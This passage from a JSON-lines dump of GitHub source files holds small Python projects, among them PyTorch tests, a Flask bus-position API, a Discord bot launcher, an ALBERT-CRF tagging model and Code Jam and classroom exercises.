params.OUTPUT_SIZE)\n y1 = int(bbox[1] / 1024 * params.OUTPUT_SIZE)\n x2 = int(bbox[2] / 1024 * params.OUTPUT_SIZE)\n y2 = int(bbox[3] / 1024 * params.OUTPUT_SIZE)\n x3 = int(bbox[4] / 1024 * params.OUTPUT_SIZE)\n y3 = int(bbox[5] / 1024 * params.OUTPUT_SIZE)\n x4 = int(bbox[6] / 1024 * params.OUTPUT_SIZE)\n y4 = int(bbox[7] / 1024 * params.OUTPUT_SIZE)\n cv2.line(img, (x1, y1), (x2, y2), color, 1)\n cv2.line(img, (x2, y2), (x3, y3), (0, 0, 255), 1)\n cv2.line(img, (x3, y3), (x4, y4), color, 1)\n cv2.line(img, (x4, y4), (x1, y1), (0, 0, 255), 1)\n\n\nif __name__ == '__main__':\n # Get dataset statistics\n #count()\n # Separate and create train/test dataset folders for CLS training\n #create_cls_txt(top_10, '%s/cls_top_10.txt' % DATA_PATH)\n #create_top_n(top_10, 'top_10', 143)\n #create_test(top_10, 'top_10', 15)\n # Add grasping .txt files to the train/test dataset folders\n #no_match, total = find_grasp_file()\n #print(no_match, total)\n #get_grasp_files()\n # Visualize Grasp training data to make sure it all makes sens\n test_data_loader()","repo_name":"stevolopolis/GrTrainer","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":9359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23371937531","text":"import sys\r\nimport logging\r\n\r\ndef saving_the_universe(engines, queries, level=0):\r\n visited = set()\r\n count = 0\r\n for q in queries:\r\n if q not in visited:\r\n visited.add(q)\r\n else:\r\n log.debug('')\r\n \r\n if len(visited) == len(engines):\r\n visited.clear()\r\n visited.add(q)\r\n count += 1\r\n return count\r\n\r\n\r\n# log initialization\r\nlogging.basicConfig()\r\nlog = logging.getLogger(__name__)\r\n#log.setLevel(logging.DEBUG)\r\nlog.setLevel(logging.INFO)\r\n\r\n# open files\r\ninput = open(sys.argv[1], 'r')\r\noutput = open('saving_the_universe.out', 'w')\r\n\r\n# read input\r\nlines = input.readlines()\r\n\r\n# N - number of cases\r\nN = int(lines[0])\r\ndel lines[0]\r\n\r\nfor case in range(N):\r\n engines = []\r\n queries = []\r\n\r\n #S - the number of search engines\r\n S = int(lines[0])\r\n del lines[0]\r\n\r\n for engine in range(S):\r\n engines.append(lines[0].strip())\r\n del lines[0]\r\n\r\n #Q - the number of incoming queries\r\n Q = int(lines[0])\r\n del lines[0]\r\n\r\n for query in range(Q):\r\n queries.append(lines[0].strip())\r\n del lines[0]\r\n\r\n log.info('Case #' + str(case+1) + ': ' + str(saving_the_universe(engines, queries)) + '\\n')\r\n output.write('Case #' + str(case+1) + ': ' + str(saving_the_universe(engines, queries)) + '\\n')\r\n\r\ninput.close()\r\noutput.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_1/350.py","file_name":"350.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32313656242","text":"import torch\nfrom unittest import TestCase\n\nfrom src.modules.masked_linear import MaskedLinear, add_masks_to_module\n\n\nINPUTS = (torch.arange(0, 10).unsqueeze(0).unsqueeze(0).float() + 1) / 10.0\n\n\nclass _MockModel(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.linear1 = torch.nn.Linear(10, 10)\n self.linear2 = torch.nn.Linear(3, 3)\n self.other = torch.nn.BatchNorm1d(10)\n\n\nclass MaskedLinearTest(TestCase):\n\n \"\"\"Test cases for pruning unsaturated activations.\n \n Most of these test cases utilize the RnnNorm, i.e. assume close to zero == unsaturated.\n \"\"\"\n\n def test_masked_linear(self):\n torch.random.manual_seed(1066)\n inputs = torch.randn(10)\n linear = torch.nn.Linear(10, 10)\n masked_linear = MaskedLinear.convert(linear)\n\n torch.testing.assert_allclose(masked_linear(inputs), linear(inputs))\n masked_linear.mask.data.fill_(0.)\n torch.testing.assert_allclose(masked_linear(inputs), linear.bias)\n\n def test_add_masks_to_model_sequential(self):\n torch.random.manual_seed(37)\n model = torch.nn.Sequential(\n torch.nn.Linear(10, 10),\n torch.nn.ReLU(),\n torch.nn.Linear(10, 10),\n torch.nn.Softmax(dim=-1),\n )\n add_masks_to_module(model)\n\n modules = list(model.children())\n assert isinstance(modules[0], MaskedLinear)\n assert isinstance(modules[1], torch.nn.ReLU)\n assert isinstance(modules[2], MaskedLinear)\n assert isinstance(modules[3], torch.nn.Softmax)\n \n def test_add_masks_to_model_update_attr_refs(self):\n model = _MockModel()\n add_masks_to_module(model)\n self.assertIsInstance(model.linear1, MaskedLinear)\n self.assertIsInstance(model.linear2, MaskedLinear)\n self.assertIsInstance(model.other, torch.nn.BatchNorm1d)\n","repo_name":"viking-sudo-rm/saturated-sgd","sub_path":"src/tests/modules/test_masked_linear.py","file_name":"test_masked_linear.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72196975875","text":"from pip._vendor import requests\n\nfrom functions.functions import CircleAreaFunction\n\n\ndef get_random_circle_area():\n url = 'https://www.random.org/integers/'\n params = {\n 'num': 1,\n 'min': 1,\n 'max': 10,\n 'col': 1,\n 'base': 10,\n 'format': 'plain',\n 'rnd': 'new',\n }\n try:\n response = requests.get(url=url, params=params)\n except ConnectionError:\n return 'Error', 'Error'\n\n radius = int(response.content)\n circle_function = CircleAreaFunction(radius)\n circle_function.solve()\n answer = circle_function.answer[0]\n return radius, answer\n","repo_name":"Ingwar121/workshop","sub_path":"functions/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11975155287","text":"import os\n\nfrom client import MyClient\n\nif __name__ == '__main__':\n bot = 'staria'\n print('start', bot)\n # this is a application token\n token = os.environ.get(bot)\n\n # pass unique str\n client = MyClient(bot)\n client.post_works.start(19, 30)\n client.post_sleep.start(21, 30)\n print('end', bot)\n client.run(token)","repo_name":"s0ngkran/discord-bot","sub_path":"c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23943194004","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 9 10:11:38 2022\r\n\r\n@author: Rephayah\r\n\"\"\"\r\nimport numpy as np\r\n\r\nv=1\r\ngridcols = 8\r\ngridrows = 7\r\nn = gridcols\r\nb = gridrows\r\n\r\ncoords = []\r\nfor i in range(1,b+1):\r\n for j in range(1, n+1):\r\n coords.append([i,j])\r\n \r\nprint(coords)\r\ncoords = [str(x) for x in coords]\r\nc = []\r\nfor p in range(len(coords)):\r\n q= coords[p].split(\"[\") #Remove closing parenthese\r\n c.append(q)\r\nf = []\r\nfor a in range(len(c)):\r\n g = c[a][1]\r\n f.append(g)\r\n \r\nd = []\r\nfor l in range(len(f)):\r\n t = f[l].split(\"]\")\r\n d.append(t)\r\n \r\ne = []\r\nfor l in range(len(f)):\r\n h = d[l][0]\r\n e.append(h)\r\n\r\nz = []\r\nfor l in range(len(f)):\r\n ahhh = e[l].replace(\", \", \"_\")\r\n z.append(ahhh)\r\n\r\n\r\n# z = z[gridcols+2:]\r\n# print(z)\r\n# with open('Pilot.txt') as f:\r\n# lines = f.readlines()\r\n \r\n# MainDirectory = lines[0][16:-1]\r\n# MainDirectory = MainDirectory.replace(\"\\\\\",\"/\")\r\n# n = lines[1][-2]\r\n# ImageJMacrosDirectory = lines[2][25:-1]\r\n# ImageJMacrosDirectory = ImageJMacrosDirectory.replace(\"\\\\\",\"/\")\r\n# BatchFileMacrosDirectory = lines[3][23:-1]\r\n# BatchFileMacrosDirectory = BatchFileMacrosDirectory.replace(\"\\\\\",\"/\")\r\n# PathtoFiji = lines[4][14:-1]\r\n# SendToEmail = lines[5][12:-1]\r\n# WorkStationEmail = lines[6][23:-1]\r\n# Password = lines[7][10:-1]\r\n# ProjectName = lines[8][14:-1]\r\n# # gridsize = lines[9][10:]\r\n\r\n# directory = MainDirectory\r\n# path = ImageJMacrosDirectory\r\n# print(z)\r\n# n = gridsize #Number of regions\r\nimport pandas as pd\r\nimport csv\r\n# for j in range(1,n+1):\r\n# PreprocessedMacroLine = 'run(\"Grid/Collection stitching\", \"type=[Filename defined position] order=[Defined by filename ] grid_size_x=3 grid_size_y=3 tile_overlap=10 first_file_index_x=0 first_file_index_y=0 directory=['+'{}'.format(MainDirectory)+'/tif'+ '] file_names=step0_{y}_{x}.tif output_textfile_name=TileConfiguration_Preprocessed.txt fusion_method=[Linear Blending] regression_threshold=0.30 max/avg_displacement_threshold=2.50 absolute_displacement_threshold=3.50 compute_overlap computation_parameters=[Save memory (but be slower)] image_output=[Fuse and display]\");'\r\n \r\nL2 = []\r\nfor j in range(1,v+1):\r\n for i in range(len(z)):\r\n L1 = '''open(\"/BlN/step{}_{}.BlN_crop.tif\");'\r\n 'selectWindow(\"step{}_{}.BlN_crop.tif\");'''.format(j,z[i],j,z[i])\r\n L2.append(L1)\r\n\r\n# path = r'C:\\Users\\repha\\Documents\\Grad School\\Research\\Scripts\\SEM-DIC\\Works on Marshawn'\r\nL19 = 'run(\"Images to Stack\", \"name=Stack title=[] use\");' #Giving Error in Batch\r\n\r\nL20 = '//run(\"Brightness/Contrast...\");'\r\nL2.append(L19)\r\nL2.append(L20)\r\nSad = np.array(L2, dtype=object)\r\nHappy = pd.Series(Sad)\r\nConfused = pd.DataFrame(Happy).replace(' ',' ')\r\n# Confused.to_csv(path+'/Test.ijm', float_format=None, index=False, mode ='w', header=False, sep='\\t', quoting=csv.QUOTE_NONE, escapechar = '\\t')\r\n","repo_name":"AlloyinIllinoisan/DIC-SEM","sub_path":"Automation_at_its_finest/Good to Go/Creates_Grid.py","file_name":"Creates_Grid.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11108781611","text":"import pytest\n\nfrom werkzeug.datastructures import FileStorage\nfrom lib.py3rumcajs.helpers.file_processing import (validate_file,\n validate_extension,\n validate_by_1stline,\n parse_to_dict,\n )\n\n\ndef test_validate_file(testfile, test_stuff_path):\n filepath = test_stuff_path + testfile\n with open(filepath, 'r') as fp:\n file = FileStorage(fp)\n assert validate_file(file) == True\n\n\ndef test_validate_file_extension(testfile, test_stuff_path):\n filepath = test_stuff_path + testfile\n with open(filepath, 'r') as fp:\n file = FileStorage(fp)\n assert validate_extension(file) == True\n\n\ndef test_validate_by1stline(testfile, test_stuff_path):\n filepath = test_stuff_path + testfile\n with open(filepath, 'r') as fp:\n file = FileStorage(fp)\n assert validate_by_1stline(file) == True\n\n\ndef test_validate_file_by_regex_fail(fail_testfile, test_stuff_path):\n filepath = test_stuff_path + fail_testfile\n with open(filepath, 'r') as fp:\n file = FileStorage(fp)\n assert validate_file(file) == False\n\n\ndef test_parse(testfile, test_stuff_path):\n data = parse_to_dict(testfile)\n assert data['data'] != []\n assert data['name'] == testfile\n assert type(data['y_prefix']) == str\n assert type(data['x_prefix']) == str\n\n\n@pytest.mark.skip(reason=\"no implemented feture yet\")\ndef test_rescale_data():\n raise\n","repo_name":"n0npax/turbo-rumcajs","sub_path":"lib/py3rumcajs/tests/helpers/test_file_processing.py","file_name":"test_file_processing.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72396135873","text":"#\n# Plugin load tests for eggs\n#\n\nimport os\nimport sys\nfrom os.path import abspath, dirname\ncurrdir = dirname(abspath(__file__)) + os.sep\n\nimport pyutilib.th as unittest\nimport pyutilib.subprocess\n\ntry:\n import pkg_resources\n pkg_resources_avail = True\nexcept ImportError:\n pkg_resources_avail = False\ntry:\n import yaml\n yaml_available = True\nexcept ImportError:\n yaml_available = False\n\n\n@unittest.skipIf(not pkg_resources_avail, \"Cannot import 'pkg_resources'\")\nclass Test(pyutilib.th.TestCase):\n\n def test_egg1(self):\n #\n # Load an egg for the 'project1' project.\n # Eggs are loaded in the 'eggs1' directory, but only the Project1 stuff is actually imported.\n #\n pyutilib.subprocess.run(\n [sys.executable, currdir + os.sep + \"egg1.py\", currdir, \"json\"])\n self.assertMatchesJsonBaseline(currdir + \"egg1.out\",\n currdir + \"egg1.jsn\")\n if yaml_available:\n pyutilib.subprocess.run(\n [sys.executable, currdir + os.sep + \"egg1.py\", currdir, \"yaml\"])\n self.assertMatchesYamlBaseline(currdir + \"egg1.out\",\n currdir + \"egg1.yml\")\n\n def test_egg2(self):\n #\n # Load an egg for the 'project1' project.\n # Eggs are loaded in the 'eggs1' and 'eggs2' directories, but only the \n # Project1 and Project 3 stuff is actually imported.\n #\n pyutilib.subprocess.run(\n [sys.executable, currdir + os.sep + \"egg2.py\", currdir, \"json\"])\n self.assertMatchesJsonBaseline(currdir + \"egg2.out\",\n currdir + \"egg2.jsn\")\n if yaml_available:\n pyutilib.subprocess.run(\n [sys.executable, currdir + os.sep + \"egg2.py\", currdir, \"yaml\"])\n self.assertMatchesYamlBaseline(currdir + \"egg2.out\",\n currdir + \"egg2.yml\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"PyUtilib/pyutilib","sub_path":"pyutilib/component/loader/tests/test_egg.py","file_name":"test_egg.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"61"} +{"seq_id":"6970889050","text":"import csv\n\n\ndef main():\n INUMBER_INDEX = 0\n students_dict = read_dict(\"students.csv\", INUMBER_INDEX)\n print(students_dict)\n search = str(input(\"Please enter an I-Number (xxxxxxxxx): \"))\n print (students_dict.get(search,'No such student.'))\n\n\ndef read_dict(filename, key_column_index):\n \"\"\"Read the contents of a CSV file into a compound\n dictionary and return the dictionary.\n\n Parameters\n filename: the name of the CSV file to read.\n key_column_index: the index of the column\n to use as the keys in the dictionary.\n Return: a compound dictionary that contains\n the contents of the CSV file.\n \"\"\"\n dictionary = {}\n with open(filename, \"rt\") as csv_file:\n reader = csv.reader(csv_file)\n next(reader)\n for row_list in reader:\n if len(row_list) != 0:\n key = row_list[key_column_index]\n dictionary[key] = row_list[1]\n return dictionary\n\nif __name__ == \"__main__\":\n main()","repo_name":"emfernandezv/BYU-Idaho-School-Work","sub_path":"CSE111 Programming with Functions/students.py","file_name":"students.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32216703265","text":"import torch\nimport torch.nn as nn\nfrom torchcrf import CRF\nfrom transformers import BertTokenizer, AlbertModel, AlbertConfig\nimport sys\n\nsys.path.append('/home/sy/project/albert_srl/')\n\nfrom utils.log import logger\n\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef load_tokenizer(model_path, special_token):\n logger.info('loading tokenizer {}'.format(model_path))\n tokenizer = BertTokenizer.from_pretrained(model_path)\n if special_token:\n tokenizer.add_special_tokens(special_token)\n return tokenizer\n\ndef load_config(pretrained_model_path, tokenizer):\n albertConfig = AlbertConfig.from_pretrained(pretrained_model_path,\n cls_token_id=tokenizer.cls_token_id,\n sep_token_id=tokenizer.sep_token_id,\n pad_token_id=tokenizer.pad_token_id,\n unk_token_id=tokenizer.unk_token_id,\n output_attentions=False, # whether or not return [attentions weights]\n output_hidden_states=False) # whether or not return [hidden states]\n return albertConfig\n\ndef load_pretrained_model(pretrained_model_path, tokenizer, special_token):\n logger.info('loading pretrained model {}'.format(pretrained_model_path))\n albertConfig = load_config(pretrained_model_path, tokenizer)\n model = AlbertModel.from_pretrained(pretrained_model_path, config=albertConfig)\n\n if special_token:\n # resize special token\n model.resize_token_embeddings(len(tokenizer))\n\n return model, albertConfig\n\ndef build_model(albertConfig):\n logger.info('build albertmodel!')\n model = AlbertModel(config=albertConfig)\n return model\n\nclass AlbertCrf(nn.Module):\n def __init__(self, config, pretrained_model, tag_num):\n super(AlbertCrf, self).__init__()\n self.config = config\n self.model = pretrained_model\n self.dropout = nn.Dropout(self.config.hidden_dropout_prob)\n self.classifier = nn.Linear(self.config.hidden_size + 1, tag_num) # add predicates indicator\n self.crf = CRF(num_tags=tag_num, batch_first=True)\n\n def loss(self, input_idx, token_type_ids=None, attention_mask=None, predicates=None, labels=None, label_mask=None):\n outputs = self.model(input_ids=input_idx, attention_mask=attention_mask, token_type_ids=token_type_ids)\n sequence_output = outputs[0]\n sequence_output = torch.cat((sequence_output, predicates.unsqueeze(-1)), -1)\n sequence_output = self.dropout(sequence_output)\n logits = self.classifier(sequence_output)\n # outputs = (logits,)s\n loss = self.crf(emissions=logits, tags=labels, mask=label_mask.byte())\n # outputs = (-1 * loss,) + outputs\n # return outputs # (loss), scores\n return loss\n\n def forward(self, input_idx, token_type_ids=None, attention_mask=None, predicates=None, label_mask=None):\n outputs = self.model(input_ids=input_idx, attention_mask=attention_mask, token_type_ids=token_type_ids)\n sequence_output = outputs[0]\n sequence_output = torch.cat((sequence_output, predicates.unsqueeze(-1)), -1)\n sequence_output = self.dropout(sequence_output)\n logits = self.classifier(sequence_output)\n tags = self.crf.decode(emissions=logits, mask=label_mask.byte())\n return tags\n\n","repo_name":"jiangnanboy/albert_srl","sub_path":"srl/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"70929860035","text":"class Retangulo:\n def __init__(self, ladoA, ladoB):\n self.ladoA = ladoA\n self.ladoB = ladoB\n self.area = self.ladoA*self.ladoB\n self.perimetro = 2*self.ladoA + 2*self.ladoB\n\n def mudaLados(self, ladoA, ladoB):\n self.ladoA = ladoA\n self.ladoB = ladoB\n self.area = ladoA*ladoB\n self.perimetro = 2*ladoA + 2*ladoB\n \n def retornaLadoA(self):\n return self.ladoA\n \n def retornaLadoB(self):\n return self.ladoB\n \n def calculaArea(self):\n self.area = self.ladoA*self.ladoB\n return self.area\n \n def calculaPerimetro(self):\n self.perimetro = 2*self.ladoA + 2*self.ladoB\n return self.perimetro\n\na = float(input(print(\"Digite o primeiro lado:\")))\nb = float(input(print(\"Digite o segundo lado:\")))\nobjeto = Retangulo(a, b)\nif (objeto.area % 2 == 0):\n pisos = objeto.area//2 #pisos de 2 m²\nelse:\n pisos = objeto.area//2 + 1\nif (objeto.perimetro % 4 == 0):\n rodapes = objeto.perimetro//4 #rodapés de 4 m\nelse:\n rodapes = objeto.perimetro//4 + 1\nprint(\"Quantidade de pisos: %d\"%(pisos))\nprint(\"Quantidade de rodapés: %d\"%(rodapes))","repo_name":"leotanaka4/LP-21.2","sub_path":"Classes/Classes03.py","file_name":"Classes03.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33701736591","text":"from flask import Flask, send_file, render_template, jsonify, request\nfrom flask_cors import CORS\nimport pandas as pd\nimport os\nimport psycopg2\nimport sqlalchemy as sa\nfrom db_setup import setup\n\nengine = sa.create_engine('postgresql://docker:docker@postgres:5432/default')\napp = Flask(__name__, template_folder='templates')\nCORS(app)\n\n@app.route('/')\ndef home():\n rows = pd.read_sql(\"select count(*) from bus\", engine).iloc[0]['count']\n return render_template('index.html', rows = rows)\n\n@app.route('/speed')\ndef getSpeed():\n route_id = request.args.get('route_id')\n if not route_id:\n route_id = 'B41'\n\n date = request.args.get('date')\n start_time = request.args.get('start')\n end_time = request.args.get('end')\n\n bus_positions_B41 = pd.read_sql(f\"\"\"\n select timestamp, trip_id, longitude, latitude from bus \n where route_id = '{route_id}' \n \"\"\", engine)\n\n bus_positions_B41['timestamp'] = pd.to_datetime(bus_positions_B41['timestamp'])\n\n\n return jsonify(bus_positions_B41.to_dict(orient = 'records'))\n\nif __name__ == '__main__':\n setup(engine)\n port = int(os.environ.get('PORT', 5000))\n app.run(debug=True, host='0.0.0.0', port=port)","repo_name":"zhik/flask_sample","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71125141635","text":"from views import RegressionWidget,RegressionConfWidget,PredictionWidget\r\nfrom model.infrastructure.observer import Observer\r\nfrom .PredictionController import PredictionController\r\nfrom .RegressionConfController import RegressionConfController\r\nfrom .ClassifierWorker import ClassifierWorker\r\nfrom model.Classifier import Classifier\r\nclass RegressionController(Observer):\r\n def __init__(self,model,view):\r\n super().__init__(model)\r\n self.model=model\r\n self.view=view\r\n self.classifier=Classifier(self.model)\r\n #Agregando widget de configuración\r\n self.conf=RegressionConfWidget(self.view)\r\n self.ctl_conf=RegressionConfController(self.model,self.conf,self.classifier)\r\n self.view.widget_list.addWidget(self.conf)\r\n #Agregando widget de predicción\r\n self.prediction=PredictionWidget(self.view)\r\n self.ctl_prediction=PredictionController(self.model,self.prediction,self.classifier)\r\n self.view.widget_list.addWidget(self.prediction)\r\n\r\n self.view.widget_list.setCurrentIndex(0)\r\n self.bind_signals()\r\n\r\n def bind_signals(self):\r\n self.conf.btn_calcular.pressed.connect(self.show_prediction)\r\n self.conf.btn_calcular.pressed.connect(self.ctl_prediction.set_dependiente)\r\n self.prediction.btn_conf.pressed.connect(self.show_conf)\r\n\r\n def show_conf(self):\r\n self.view.widget_list.setCurrentIndex(0)\r\n self.conf.scroll.verticalScrollBar().setValue(0)\r\n\r\n def show_prediction(self):\r\n self.view.widget_list.setCurrentIndex(1)\r\n self.prediction.scroll.verticalScrollBar().setValue(0)\r\n\r\n def end_loading(self,int):\r\n self.view.loaded.emit(40)\r\n\r\n def notify(self,model,*args,**kwargs):\r\n self.view.widget_list.setCurrentIndex(0) #Se debe recalcular el modelo\r\n if len(self.model.num_cols)>1 and len(self.model.objects)>0:\r\n self.ctl_conf.set_model()\r\n self.ctl_prediction.set_model()\r\n self.view.scrollArea.show()\r\n else:\r\n print(\"No tiene datos númericos\")\r\n self.view.scrollArea.hide()\r\n self.end_loading(100)\r\n","repo_name":"elagabalus01/myner","sub_path":"src/controllers/Regression/RegressionController.py","file_name":"RegressionController.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27590430436","text":"import os\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nimport PySimpleGUI as sg\nfrom cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305\nfrom cryptography.fernet import Fernet, InvalidToken\nfrom cryptography.hazmat.primitives.ciphers.aead import AESGCM\n\n\ndef fernetDecrypt(input_file, key, output_file):\n with open(input_file, 'rb') as f:\n data = f.read()\n\n actualdata = data[16:]\n fernet = Fernet(key)\n\n # output_file = f\"Dec-{input_file}\"\n\n try:\n\n decrypted = fernet.decrypt(actualdata)\n\n with open(output_file, 'wb') as f:\n f.write(decrypted)\n\n except:\n print(\"Invalid Key\")\n sg.popup('INVALID KEY')\n\n\ndef aesDecrypt(data, key, output_file):\n print(\"AES-CBC DECRYPTION\")\n actualdata = data[16:-16]\n iv = data[-16:]\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv))\n decryptor = cipher.decryptor()\n try:\n decrypted = decryptor.update(actualdata) + decryptor.finalize()\n with open(output_file, 'wb') as f:\n f.write(decrypted)\n print(\"AES-CBC DECRYPTION SUCCESSFUL\")\n except:\n print(\"INVALID KEY\")\n sg.popup('INVALID KEY')\n\n\ndef chacha20poly1305Decrypt(data, key, aad, output_file):\n print(\"Chacha Decrypt\")\n nonce = data[-12:]\n actualdata = data[16:-12]\n chacha = ChaCha20Poly1305(key)\n try:\n decrypted = chacha.decrypt(nonce, actualdata, aad)\n with open(output_file, 'wb') as f:\n f.write(decrypted)\n print(\"Chacha Decryption Successful\")\n except:\n print(\"EITHER INVALID KEY OR INVALID ASSOCIATED DATA\")\n sg.popup('EITHER INVALID KEY OR INVALID ASSOCIATED DATA')\n\n\ndef aesgcmDecrypt(data, key, aad, output_file):\n print(\"AES-GCM DECRYPTION\")\n aesgcm = AESGCM(key)\n nonce = data[-12:]\n actualdata = data[16:-12]\n try:\n decrypted = aesgcm.decrypt(nonce, actualdata, aad)\n with open(output_file, 'wb') as f:\n f.write(decrypted)\n print(\"AES-GCM DECRYPTION SUCCESSFUL\")\n except:\n print(\"EITHER INVALID KEY OR INVALID ASSOCIATED DATA\")\n sg.popup('EITHER INVALID KEY OR INVALID ASSOCIATED DATA')\n\n\ndef tdesDecrypt(data, key, output_file):\n print(\"Triple DES DECRYPTION\")\n actualdata = data[16:-8]\n iv = data[-8:]\n cipher = Cipher(algorithms.TripleDES(key), modes.CBC(iv))\n decryptor = cipher.decryptor()\n try:\n decrypted = decryptor.update(actualdata) + decryptor.finalize()\n with open(output_file, 'wb') as f:\n f.write(decrypted)\n print(\"Triple DES DECRYPTION SUCCESSFUL\")\n except:\n print(\"INVALID KEY\")\n sg.popup('INVALID KEY')\n","repo_name":"ayaachi-jha/encrypty","sub_path":"utils/SymmetricDecryption.py","file_name":"SymmetricDecryption.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39539805874","text":"import re\nfrom typing import Callable\nimport streamlit as st\nimport sys\nfrom streamlit import cli as stcli\n\n\ninterface_input = Callable[[], str]\ninterface_output = Callable[[str], None]\n\n\ndef CLI_input() -> str:\n \"\"\"Implement Command Line Interface Input\"\"\"\n url = input(\"Enter the youtube video URL:\")\n while not re.search(r\"^https:.+=.{3,}$\", url):\n url = input(\"Enter the youtube video URL:\")\n return url\n\n\ndef CLI_output(filename: str) -> None:\n \"\"\"Implement Command Line Interface Output\"\"\"\n print(f\"Wordcloud saved as {filename}\")\n\n\ndef streamlit_input() -> str:\n \"\"\"Implement Streamlit Interface Input\"\"\"\n if st._is_running_with_streamlit:\n st.title(\"Generate a Wordcloud from a youtube video\")\n url = st.text_input(\"Enter the youtube video URL\")\n if not re.search(r\"^https:.+=.{3,}$\", url):\n st.write(\"Enter a youtube video URL\")\n else:\n st.write(\"Processing\")\n return url\n else:\n sys.argv = [\"streamlit\", \"run\", sys.argv[0]]\n sys.exit(stcli.main())\n\n\ndef streamlit_output(filename: str) -> None:\n \"\"\"Implement Streamlit Interface Output\"\"\"\n st.write(f\"Done. Wordcloud saved as {filename}\")\n st.image(filename)\n","repo_name":"Guillaume-Fgt/Wordcloud_Youtube","sub_path":"wordcloud_youtube/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26588375788","text":"#Arithmetic operators\nx = 5\ny = 2\nprint ( \"x ** y = {0}\".format( x ** y) )\nprint ( \"x / y = {0}\".format( x / y) )\nprint ( \"x // y = {0}\".format( x // y) )\n#ceil\n\n\n#Assignment operators\nx = 4\ny = 3\nprint ('4 & 3 = {0}'.format(4 & 3))\n\nx = 5\ny = 3\nprint ('5 & 3 = {0}'.format(5 & 3))\n\n\n\nprint ( \"x ^ y = {0}\".format( x ^ y) ) # exclusive OR\n\n#logical operators\nx= 5\ny=10\nz=15\n\nif x y):\n print(\"NOT succeeded...\")\n\nx ='a'\ny='b'\nz='a'\n\nif x is z:\n print(\"x and z are same\")\n\nif x is not y:\n print(\"x is not y\")\n\nx = 10\nx+=10 # x = x+ 10\n\nx = 13\nprint(\"x = 13, value = {0}\".format(x))\nx >>=1\nprint(\"x >>=1, value = {0}\".format(x))\nx >>=1\nprint(\"x >>=1, value = {0}\".format(x))\n","repo_name":"hencilpeter/DataEngineering","sub_path":"BigData/PythonSamples/10_Operators.py","file_name":"10_Operators.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70054833155","text":"from compas_cem.optimization.parameters import NodeParameter\n\n\n__all__ = [\"OriginNodeXParameter\",\n \"OriginNodeYParameter\",\n \"OriginNodeZParameter\"]\n\n# ------------------------------------------------------------------------------\n# Origin Node Parameter on X\n# ------------------------------------------------------------------------------\n\n\nclass OriginNodeXParameter(NodeParameter):\n \"\"\"\n Sets the X coordinate of an origin node as an optimization parameter.\n \"\"\"\n def __init__(self, key=None, bound_low=None, bound_up=None):\n super(OriginNodeXParameter, self).__init__(key, bound_low, bound_up)\n self._attr_name = \"x\"\n\n# ------------------------------------------------------------------------------\n# Origin Node Parameter on Y\n# ------------------------------------------------------------------------------\n\n\nclass OriginNodeYParameter(NodeParameter):\n \"\"\"\n Sets the Y coordinate of an origin node as an optimization parameter.\n \"\"\"\n def __init__(self, key=None, bound_low=None, bound_up=None):\n super(OriginNodeYParameter, self).__init__(key, bound_low, bound_up)\n self._attr_name = \"y\"\n\n# ------------------------------------------------------------------------------\n# Origin Node Parameter on Z\n# ------------------------------------------------------------------------------\n\n\nclass OriginNodeZParameter(NodeParameter):\n \"\"\"\n Sets the Z coordinate of an origin node as an optimization parameter.\n \"\"\"\n def __init__(self, key=None, bound_low=None, bound_up=None):\n super(OriginNodeZParameter, self).__init__(key, bound_low, bound_up)\n self._attr_name = \"z\"\n\n# ------------------------------------------------------------------------------\n# Main function\n# ------------------------------------------------------------------------------\n\n\nif __name__ == \"__main__\":\n\n from compas.geometry import Point\n\n from compas_cem.diagrams import TopologyDiagram\n\n from compas_cem.elements import Node\n from 